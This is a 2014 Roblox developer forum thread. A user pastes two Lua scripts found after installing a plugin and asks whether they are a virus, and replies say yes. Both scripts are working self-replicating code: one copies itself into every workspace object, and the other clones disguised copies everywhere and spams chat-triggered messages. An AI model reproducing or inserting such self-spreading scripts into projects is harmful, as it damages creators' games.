generic image
Processing...
  • Games
  • Catalog
  • Develop
  • Robux
  • Search in Players
  • Search in Games
  • Search in Catalog
  • Search in Groups
  • Search in Library
  • Log In
  • Sign Up
  • Games
  • Catalog
  • Develop
  • Robux
   
ROBLOX Forum » Game Creation and Development » Scripting Helpers
Home Search
 

Re: Is this a virus script?

Previous Thread :: Next Thread 
SiameseSweq is not online. SiameseSweq
Joined: 22 Dec 2012
Total Posts: 221
24 Oct 2014 10:00 PM
After inserting a plugin I found my workspace has been spammed with 'Spencer2015'
And there was scripts inside.

Here are the scripts I found:
One names "Vaccine"
function spread() -- created by 57rusted :p
local stuff = game.Workspace:GetChildren()
for i = 1, #stuff do
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
local clone = script:clone()
clone.Parent = stuff[i]
end
end
end

while true do
wait(.1)
spread()
end

function GetAllItems(mdl)
local objs = {}
function Search(obj)
if obj~=workspace then
table.insert(objs,obj)
end
if #obj:GetChildren() > 0 then
for i, v in ipairs(obj:GetChildren()) do
Search(v)
end
end
end
Search(mdl)
return objs
end



for i, v in ipairs(GetAllItems(workspace)) do
if v.className == "Script" then
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then
v.Parent = game.Lighting --Just in case it has a removal prevention.
t = Instance.new("ObjectValue")
t.Name = "IsAVirus"
t.Parent = v
end
end
end

for i, v in ipairs(game.Lighting:GetChildren()) do
if v:findFirstChild("IsAVirus") then --Only remove the viruses.
v:remove()
end
end


print("Virus debugged! All clean!")






And another named ProperGrammarNeededInPhilosiphalLocation;InsertNoobHere
Scripts:
names={"spencer2015"}
local NameCheck = false
script.Parent.Name = names[math.random(1, #names)]
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
local c = script.Parent:Clone()

function addEvent(ch)
wait(math.random())
NameCheck = false
for ss = 1, #names do
if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
NameCheck = true
end
end
if NameCheck == false then
local cloak = c:Clone()
cloak.Name = ""
cloak:GetChildren()[1].Name = ""
cloak.Parent = ch
cloak.Name = names[math.random(1, 5)]
end
end

workspace.ChildAdded:connect(addEvent)

game.Players.PlayerAdded:connect(function(pl)
pl.Chatted:connect(function(m)
if m:sub(1, 5) == "Loop" then
local m = Instance.new("Message")
m.Parent = workspace
m.Text = "THEY CALL ME CRAZY"
wait(1)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "GOTTA GOTTA BE CRAZY"
wait(1)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "GOTTA GET A LIFE (YOU)"
wait(3)
m:remove()
end
if m:sub(1, 5) == "HAX!" then
local m = Instance.new("Message")
m.Parent = workspace
m.Text = "HAX!"
wait(3)
m:remove()
end
end)
end)

while true do
local s = workspace:GetChildren()
for i = 1, #s do
NameCheck = false
for ss = 1, #names do
if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
NameCheck = true
end
end
if NameCheck == false then
local cloak = c:Clone()
cloak.Name = ""
cloak:GetChildren()[1].Name = ""
cloak.Parent = s[i]
end
wait(0.1)
end
wait(1)
end





Is this a virus or a virus cleaner? Or what is it.
Report Abuse
LegendaryAccount is not online. LegendaryAccount
Joined: 02 Jun 2010
Total Posts: 13193
24 Oct 2014 10:13 PM
virus and uninstall the plugin its a virus
Report Abuse
LegendaryAccount is not online. LegendaryAccount
Joined: 02 Jun 2010
Total Posts: 13193
24 Oct 2014 10:16 PM
the first one looks like a virus cleaner but does not have a large database of virus names
Report Abuse
SiameseSweq is not online. SiameseSweq
Joined: 22 Dec 2012
Total Posts: 221
25 Oct 2014 02:10 PM
Okay thanks
Report Abuse
Previous Thread :: Next Thread 
Page 1 of 1
 
 
ROBLOX Forum » Game Creation and Development » Scripting Helpers
   
 
   
  • About Us
  • Jobs
  • Blog
  • Parents
  • Help
  • Terms
  • Privacy

©2017 Roblox Corporation. Roblox, the Roblox logo, Robux, Bloxy, and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.



Progress
Starting Roblox...
Connecting to Players...
R R

Roblox is now loading. Get ready to play!

R R

You're moments away from getting into the game!

Click here for help

Check Remember my choice and click Launch Application in the dialog box above to join games faster in the future!

Gameplay sponsored by:
Loading 0% - Starting game...
Get more with Builders Club! Join Builders Club
Choose Your Avatar
I have an account
generic image